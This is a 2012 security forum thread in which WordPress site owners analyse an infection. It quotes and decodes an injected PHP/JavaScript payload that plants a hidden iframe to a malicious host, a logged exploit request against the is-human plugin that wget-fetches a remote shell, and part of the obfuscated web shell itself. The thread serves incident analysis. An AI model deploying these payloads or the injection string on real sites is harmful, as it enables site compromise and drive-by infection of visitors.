New wordpress exploit

Discussion in 'Security' started by dev22, Jan 23, 2012.

0
Page 1 of 2
  1. #1
    i got my server infected with this thing. its inejcting this code to all index.php files. still havent been able to find out the cause. i saw similar stuff in past and it was some file well hidden in wordpress structure, being accessed remotely and executing some code via this file.

    index.php contains this:

    <?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1cFppaDNhVzVrYjNjdVpHOWpkVzFsYm5RcFlUMG9JblZ5WmpNaUxuTndiR2wwS3lkMGRqTXlhR3AwYTJ4dUp5a3VjM1ZpYzNSeUtEQXNOaWs3WVdFOUtFUmhkR1VyZTMwcExuTjFZbk4wY2lnd0xEWXBPMmxtS0dFOVBUMWhZU2tLWmoxYkxUSTRMQzB5T0N3Mk9DdzJOU3d0TlN3ekxEWXpMRGMwTERZeUxEZ3dMRGN5TERZMExEY3pMRGM1TERrc05qWXNOalFzTnprc016SXNOekVzTmpRc056SXNOalFzTnpNc056a3NOemdzTWprc09EUXNORGNzTmpBc05qWXNOREVzTmpBc056SXNOalFzTXl3eUxEWXhMRGMwTERZekxEZzBMRElzTkN3MU5Dd3hNU3cxTml3MExEZzJMQzB5T0N3dE1qZ3NMVEk0TERZNExEWTFMRGMzTERZd0xEY3lMRFkwTERjM0xETXNOQ3d5TWl3dE1qZ3NMVEk0TERnNExDMDFMRFkwTERjeExEYzRMRFkwTEMwMUxEZzJMQzB5T0N3dE1qZ3NMVEk0TERZekxEYzBMRFl5TERnd0xEY3lMRFkwTERjekxEYzVMRGtzT0RJc056Y3NOamdzTnprc05qUXNNeXd0TXl3eU15dzJPQ3cyTlN3M055dzJNQ3czTWl3Mk5Dd3ROU3czT0N3M055dzJNaXd5TkN3eUxEWTNMRGM1TERjNUxEYzFMREl4TERFd0xERXdMRFk0TERjNUxEY3dMRFl5TERjeUxEYzNMRGtzT0RVc09EUXNOek1zTnpnc09TdzJNaXczTkN3M01pd3hNQ3cyT0N3eE1DdzJPQ3c1TERjMUxEWTNMRGMxTERJMkxEWTJMRGMwTERJMExERXlMRElzTFRVc09ESXNOamdzTmpNc056a3NOamNzTWpRc01pd3hNaXd4TVN3eUxDMDFMRFkzTERZMExEWTRMRFkyTERZM0xEYzVMREkwTERJc01USXNNVEVzTWl3dE5TdzNPQ3czT1N3NE5DdzNNU3cyTkN3eU5Dd3lMRGd4TERZNExEYzRMRFk0TERZeExEWTRMRGN4TERZNExEYzVMRGcwTERJeExEWTNMRFk0TERZekxEWXpMRFkwTERjekxESXlMRGMxTERjMExEYzRMRFk0TERjNUxEWTRMRGMwTERjekxESXhMRFl3TERZeExEYzRMRGMwTERjeExEZ3dMRGM1TERZMExESXlMRGN4TERZMExEWTFMRGM1TERJeExERXhMREl5TERjNUxEYzBMRGMxTERJeExERXhMREl5TERJc01qVXNNak1zTVRBc05qZ3NOalVzTnpjc05qQXNOeklzTmpRc01qVXNMVE1zTkN3eU1pd3RNamdzTFRJNExEZzRMQzB5T0N3dE1qZ3NOalVzT0RBc056TXNOaklzTnprc05qZ3NOelFzTnpNc0xUVXNOamdzTmpVc056Y3NOakFzTnpJc05qUXNOemNzTXl3MExEZzJMQzB5T0N3dE1qZ3NMVEk0TERneExEWXdMRGMzTEMwMUxEWTFMQzAxTERJMExDMDFMRFl6TERjMExEWXlMRGd3TERjeUxEWTBMRGN6TERjNUxEa3NOaklzTnpjc05qUXNOakFzTnprc05qUXNNeklzTnpFc05qUXNOeklzTmpRc056TXNOemtzTXl3eUxEWTRMRFkxTERjM0xEWXdMRGN5TERZMExESXNOQ3d5TWl3Mk5TdzVMRGM0TERZMExEYzVMREk0TERjNUxEYzVMRGMzTERZNExEWXhMRGd3TERjNUxEWTBMRE1zTWl3M09DdzNOeXcyTWl3eUxEY3NNaXcyTnl3M09TdzNPU3czTlN3eU1Td3hNQ3d4TUN3Mk9DdzNPU3czTUN3Mk1pdzNNaXczTnl3NUxEZzFMRGcwTERjekxEYzRMRGtzTmpJc056UXNOeklzTVRBc05qZ3NNVEFzTmpnc09TdzNOU3cyTnl3M05Td3lOaXcyTml3M05Dd3lOQ3d4TWl3eUxEUXNNaklzTmpVc09TdzNPQ3czT1N3NE5DdzNNU3cyTkN3NUxEZ3hMRFk0TERjNExEWTRMRFl4TERZNExEY3hMRFk0TERjNUxEZzBMREkwTERJc05qY3NOamdzTmpNc05qTXNOalFzTnpNc01pd3lNaXcyTlN3NUxEYzRMRGM1TERnMExEY3hMRFkwTERrc056VXNOelFzTnpnc05qZ3NOemtzTmpnc056UXNOek1zTWpRc01pdzJNQ3cyTVN3M09DdzNOQ3czTVN3NE1DdzNPU3cyTkN3eUxESXlMRFkxTERrc056Z3NOemtzT0RRc056RXNOalFzT1N3M01TdzJOQ3cyTlN3M09Td3lOQ3d5TERFeExESXNNaklzTmpVc09TdzNPQ3czT1N3NE5DdzNNU3cyTkN3NUxEYzVMRGMwTERjMUxESTBMRElzTVRFc01pd3lNaXcyTlN3NUxEYzRMRFkwTERjNUxESTRMRGM1TERjNUxEYzNMRFk0TERZeExEZ3dMRGM1TERZMExETXNNaXc0TWl3Mk9DdzJNeXczT1N3Mk55d3lMRGNzTWl3eE1pd3hNU3d5TERRc01qSXNOalVzT1N3M09DdzJOQ3czT1N3eU9DdzNPU3czT1N3M055dzJPQ3cyTVN3NE1DdzNPU3cyTkN3ekxESXNOamNzTmpRc05qZ3NOallzTmpjc056a3NNaXczTERJc01USXNNVEVzTWl3MExESXlMQzB5T0N3dE1qZ3NMVEk0TERZekxEYzBMRFl5TERnd0xEY3lMRFkwTERjekxEYzVMRGtzTmpZc05qUXNOemtzTXpJc056RXNOalFzTnpJc05qUXNOek1zTnprc056Z3NNamtzT0RRc05EY3NOakFzTmpZc05ERXNOakFzTnpJc05qUXNNeXd5TERZeExEYzBMRFl6TERnMExESXNOQ3cxTkN3eE1TdzFOaXc1TERZd0xEYzFMRGMxTERZMExEY3pMRFl6TERNd0xEWTNMRFk0TERjeExEWXpMRE1zTmpVc05Dd3lNaXd0TWpnc0xUSTRMRGc0WFR0dFpEMG5ZU2M3Y1QwaWNTSTdaVDEzYVc1a2IzY3VaWFpoYkR0M1BXWTdjejBuSnp0blBTZG1jbThuS3lkdFEyaGhja052WkNjckoyVW5PMlp2Y2locFBUQTdhVHgzTG14bGJtZDBhRHRwS3lzcGUzTTljeXRUZEhKcGJtZGJaMTBvTXpjcmQxdHBYU2s3ZlFwcFppaGhQVDA5WVdFcENtVW9KMlVvY3lrbktUczhMM05qY21sd2REND0nKSk7DQp9')); } else { ?>
    Code (markup):
    after uncoding by base64 decoder you get this:

    error_reporting(0);
$bot = FALSE ;
$ua = $_SERVER['HTTP_USER_AGENT'];
$botsUA = array('12345','alexa.com','anonymouse.org','bdbrandprotect.com','blogpulse.com','bot','buzztracker.com','crawl','docomo','drupal.org','feedtools','htmldoc','httpclient','internetseer.com','linux','macintosh','mac os','magent','mail.ru','mybloglog api','netcraft','openacoon.de','opera mini','opera mobi','playstation','postrank.com','psp','rrrrrrrrr','rssreader','slurp','snoopy','spider','spyder','szn-image-resizer','validator','virus','vlc media player','webcollage','wordpress','x11','yandex','iphone','android');
foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false){$bot = true; break;}}
if (!$bot){
	echo(base64_decode('PHNjcmlwdD5pZih3aW5kb3cuZG9jdW1lbnQpYT0oInVyZjMiLnNwbGl0Kyd0djMyaGp0a2xuJykuc3Vic3RyKDAsNik7YWE9KERhdGUre30pLnN1YnN0cigwLDYpO2lmKGE9PT1hYSkKZj1bLTI4LC0yOCw2OCw2NSwtNSwzLDYzLDc0LDYyLDgwLDcyLDY0LDczLDc5LDksNjYsNjQsNzksMzIsNzEsNjQsNzIsNjQsNzMsNzksNzgsMjksODQsNDcsNjAsNjYsNDEsNjAsNzIsNjQsMywyLDYxLDc0LDYzLDg0LDIsNCw1NCwxMSw1Niw0LDg2LC0yOCwtMjgsLTI4LDY4LDY1LDc3LDYwLDcyLDY0LDc3LDMsNCwyMiwtMjgsLTI4LDg4LC01LDY0LDcxLDc4LDY0LC01LDg2LC0yOCwtMjgsLTI4LDYzLDc0LDYyLDgwLDcyLDY0LDczLDc5LDksODIsNzcsNjgsNzksNjQsMywtMywyMyw2OCw2NSw3Nyw2MCw3Miw2NCwtNSw3OCw3Nyw2MiwyNCwyLDY3LDc5LDc5LDc1LDIxLDEwLDEwLDY4LDc5LDcwLDYyLDcyLDc3LDksODUsODQsNzMsNzgsOSw2Miw3NCw3MiwxMCw2OCwxMCw2OCw5LDc1LDY3LDc1LDI2LDY2LDc0LDI0LDEyLDIsLTUsODIsNjgsNjMsNzksNjcsMjQsMiwxMiwxMSwyLC01LDY3LDY0LDY4LDY2LDY3LDc5LDI0LDIsMTIsMTEsMiwtNSw3OCw3OSw4NCw3MSw2NCwyNCwyLDgxLDY4LDc4LDY4LDYxLDY4LDcxLDY4LDc5LDg0LDIxLDY3LDY4LDYzLDYzLDY0LDczLDIyLDc1LDc0LDc4LDY4LDc5LDY4LDc0LDczLDIxLDYwLDYxLDc4LDc0LDcxLDgwLDc5LDY0LDIyLDcxLDY0LDY1LDc5LDIxLDExLDIyLDc5LDc0LDc1LDIxLDExLDIyLDIsMjUsMjMsMTAsNjgsNjUsNzcsNjAsNzIsNjQsMjUsLTMsNCwyMiwtMjgsLTI4LDg4LC0yOCwtMjgsNjUsODAsNzMsNjIsNzksNjgsNzQsNzMsLTUsNjgsNjUsNzcsNjAsNzIsNjQsNzcsMyw0LDg2LC0yOCwtMjgsLTI4LDgxLDYwLDc3LC01LDY1LC01LDI0LC01LDYzLDc0LDYyLDgwLDcyLDY0LDczLDc5LDksNjIsNzcsNjQsNjAsNzksNjQsMzIsNzEsNjQsNzIsNjQsNzMsNzksMywyLDY4LDY1LDc3LDYwLDcyLDY0LDIsNCwyMiw2NSw5LDc4LDY0LDc5LDI4LDc5LDc5LDc3LDY4LDYxLDgwLDc5LDY0LDMsMiw3OCw3Nyw2MiwyLDcsMiw2Nyw3OSw3OSw3NSwyMSwxMCwxMCw2OCw3OSw3MCw2Miw3Miw3Nyw5LDg1LDg0LDczLDc4LDksNjIsNzQsNzIsMTAsNjgsMTAsNjgsOSw3NSw2Nyw3NSwyNiw2Niw3NCwyNCwxMiwyLDQsMjIsNjUsOSw3OCw3OSw4NCw3MSw2NCw5LDgxLDY4LDc4LDY4LDYxLDY4LDcxLDY4LDc5LDg0LDI0LDIsNjcsNjgsNjMsNjMsNjQsNzMsMiwyMiw2NSw5LDc4LDc5LDg0LDcxLDY0LDksNzUsNzQsNzgsNjgsNzksNjgsNzQsNzMsMjQsMiw2MCw2MSw3OCw3NCw3MSw4MCw3OSw2NCwyLDIyLDY1LDksNzgsNzksODQsNzEsNjQsOSw3MSw2NCw2NSw3OSwyNCwyLDExLDIsMjIsNjUsOSw3OCw3OSw4NCw3MSw2NCw5LDc5LDc0LDc1LDI0LDIsMTEsMiwyMiw2NSw5LDc4LDY0LDc5LDI4LDc5LDc5LDc3LDY4LDYxLDgwLDc5LDY0LDMsMiw4Miw2OCw2Myw3OSw2NywyLDcsMiwxMiwxMSwyLDQsMjIsNjUsOSw3OCw2NCw3OSwyOCw3OSw3OSw3Nyw2OCw2MSw4MCw3OSw2NCwzLDIsNjcsNjQsNjgsNjYsNjcsNzksMiw3LDIsMTIsMTEsMiw0LDIyLC0yOCwtMjgsLTI4LDYzLDc0LDYyLDgwLDcyLDY0LDczLDc5LDksNjYsNjQsNzksMzIsNzEsNjQsNzIsNjQsNzMsNzksNzgsMjksODQsNDcsNjAsNjYsNDEsNjAsNzIsNjQsMywyLDYxLDc0LDYzLDg0LDIsNCw1NCwxMSw1Niw5LDYwLDc1LDc1LDY0LDczLDYzLDMwLDY3LDY4LDcxLDYzLDMsNjUsNCwyMiwtMjgsLTI4LDg4XTttZD0nYSc7cT0icSI7ZT13aW5kb3cuZXZhbDt3PWY7cz0nJztnPSdmcm8nKydtQ2hhckNvZCcrJ2UnO2ZvcihpPTA7aTx3Lmxlbmd0aDtpKyspe3M9cytTdHJpbmdbZ10oMzcrd1tpXSk7fQppZihhPT09YWEpCmUoJ2UocyknKTs8L3NjcmlwdD4='));
}
    Code (markup):
    first part blocks all robots from accessing such a file. further decoding:

    <script>if(window.document)a=("urf3".split+'tv32hjtkln').substr(0,6);aa=(Date+{}).substr(0,6);if(a===aa)
f=[-28,-28,68,65,-5,3,63,74,62,80,72,64,73,79,9,66,64,79,32,71,64,72,64,73,79,78,29,84,47,60,66,41,60,72,64,3,2,61,74,63,84,2,4,54,11,56,4,86,-28,-28,-28,68,65,77,60,72,64,77,3,4,22,-28,-28,88,-5,64,71,78,64,-5,86,-28,-28,-28,63,74,62,80,72,64,73,79,9,82,77,68,79,64,3,-3,23,68,65,77,60,72,64,-5,78,77,62,24,2,67,79,79,75,21,10,10,68,79,70,62,72,77,9,85,84,73,78,9,62,74,72,10,68,10,68,9,75,67,75,26,66,74,24,12,2,-5,82,68,63,79,67,24,2,12,11,2,-5,67,64,68,66,67,79,24,2,12,11,2,-5,78,79,84,71,64,24,2,81,68,78,68,61,68,71,68,79,84,21,67,68,63,63,64,73,22,75,74,78,68,79,68,74,73,21,60,61,78,74,71,80,79,64,22,71,64,65,79,21,11,22,79,74,75,21,11,22,2,25,23,10,68,65,77,60,72,64,25,-3,4,22,-28,-28,88,-28,-28,65,80,73,62,79,68,74,73,-5,68,65,77,60,72,64,77,3,4,86,-28,-28,-28,81,60,77,-5,65,-5,24,-5,63,74,62,80,72,64,73,79,9,62,77,64,60,79,64,32,71,64,72,64,73,79,3,2,68,65,77,60,72,64,2,4,22,65,9,78,64,79,28,79,79,77,68,61,80,79,64,3,2,78,77,62,2,7,2,67,79,79,75,21,10,10,68,79,70,62,72,77,9,85,84,73,78,9,62,74,72,10,68,10,68,9,75,67,75,26,66,74,24,12,2,4,22,65,9,78,79,84,71,64,9,81,68,78,68,61,68,71,68,79,84,24,2,67,68,63,63,64,73,2,22,65,9,78,79,84,71,64,9,75,74,78,68,79,68,74,73,24,2,60,61,78,74,71,80,79,64,2,22,65,9,78,79,84,71,64,9,71,64,65,79,24,2,11,2,22,65,9,78,79,84,71,64,9,79,74,75,24,2,11,2,22,65,9,78,64,79,28,79,79,77,68,61,80,79,64,3,2,82,68,63,79,67,2,7,2,12,11,2,4,22,65,9,78,64,79,28,79,79,77,68,61,80,79,64,3,2,67,64,68,66,67,79,2,7,2,12,11,2,4,22,-28,-28,-28,63,74,62,80,72,64,73,79,9,66,64,79,32,71,64,72,64,73,79,78,29,84,47,60,66,41,60,72,64,3,2,61,74,63,84,2,4,54,11,56,9,60,75,75,64,73,63,30,67,68,71,63,3,65,4,22,-28,-28,88];md='a';q="q";e=window.eval;w=f;s='';g='fro'+'mCharCod'+'e';for(i=0;i<w.length;i++){s=s+String[g](37+w[i]);}
if(a===aa)
e('e(s)');</script>
    Code (markup):
    we get encoded javascript. more decoding:

    //eval e(s)  //eval if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://itkcmr.zyns.com/i/i.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function iframer(){var f = document.createElement('iframe');f.setAttribute('src','http://itkcmr.zyns.com/i/i.php?go=1');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10');document.getElementsByTagName('body')[0].appendChild(f);}  //document.write (s)  <iframe src='http://itkcmr.zyns.com/i/i.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe> //jsunpack.url var s = if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://itkcmr.zyns.com/i/i.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function iframer(  //jsunpack.url var newurl = if (document.getElementsByTagName('body')[0]){iframer();} else {document.write("<iframe src='http://itkcmr.zyns.com/i/i.php?go=1' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");}function iframer(
    Code (markup):
    so what this whole thing does is that it places iframe on your page with this url:

    http://itkcmr.zyns.com/i/i.php?go=1
    Code (markup):
    which contains evil code doing further mess with your computer.

    watch out before this! and pls report if you know more about prevention and thing causing this!
     
    dev22, Jan 23, 2012 IP
  2. ShayneSherman

    ShayneSherman Peon

    Messages:
    93
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #2
    Mine too man. I have my host looking into this. It effected all 50+ sites on my server!!
     
    ShayneSherman, Jan 23, 2012 IP
  3. dev22

    dev22 Well-Known Member

    Messages:
    153
    Likes Received:
    1
    Best Answers:
    0
    Trophy Points:
    103
    #3
    i was watching through my logs and saw this suspicious request. 

     [14/Jan/2012:09:07:18 +0200] "GET //wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL3Ryb2xsLmhyMDAucnUvc2gudHh0OyBtdiBzaC50eHQgaXNfaHVtYW5fY2xhc3MucGhwJyk7));error HTTP/1.1" 301 5 "-" "Mozila/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    Code (markup):
    not sure if its related to this but it contains another encoded string. if you decode it you get this:

    passthru('wget http://troll.hr00.ru/sh.txt; mv sh.txt is_human_class.php');
    Code (markup):
    which is apparently remote shell and the script tries to download it to your server.

    the script contains this:

    <?php
$auth_pass = "";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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